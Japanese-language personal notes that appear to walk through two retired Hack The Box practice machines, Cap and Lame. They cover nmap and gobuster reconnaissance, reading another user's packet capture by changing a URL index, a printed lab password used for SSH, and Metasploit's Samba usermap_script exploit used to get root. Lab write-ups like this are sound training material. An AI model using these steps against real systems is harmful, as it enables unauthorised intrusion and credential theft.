・CAP retired

nmap -sC -sV -Pn <IP>

tcp80がある。覗いてみる。
sudo vim /etc/hosts
<IP> Cap

http://
特に何もない

gobusterで探索
gobuster dir -e -u http:/// -w /usr/share/wordlists/dirb/common.txt

===============================================================
http://10.10.10.245/data                 (Status: 302) [Size: 208] [--> http://10.10.10.245/]
http://10.10.10.245/ip                   (Status: 200) [Size: 17451]
http://10.10.10.245/netstat              (Status: 200) [Size: 28561]
Progress: 4609 / 4615 (99.87%)
===============================================================
何もない

サブドメインを探す。

gobuster vhost -w /usr/share/wordlists/dirb/common.txt -u http:/// -t 50 --append-domain

何もない。

#詰まったので解説を見ました。
http://
パケット分析のページのurlが/data/5→これを/data/0にすることでnathanログイン時のパケットがのぞけるらしい。

user:nathan
pass:Buck3tH4TF0RM3!

獲得。

ssh@nathan<IP>　
pass

lsでuser.txtがあったのでそれを覗いて終わり。

・LAME retired

nmap -sV -Pn <IP>
139/tcp samba　が見つかる。怪しいけどこれの解析方法を知らない。

#解説を見る metasploitを使うと良いらしい。使ったことない。

mfsconsole
ms6>use exploit/multi/samba/usermap_script
>set rhosts<ターゲットIP>
>set LHOST<htbのIP>

whoami
>root
rootが取れれば権限を奪えたらしいので以下
cd /home
ls
cd ./<x>
・・・などでflagを探して終わり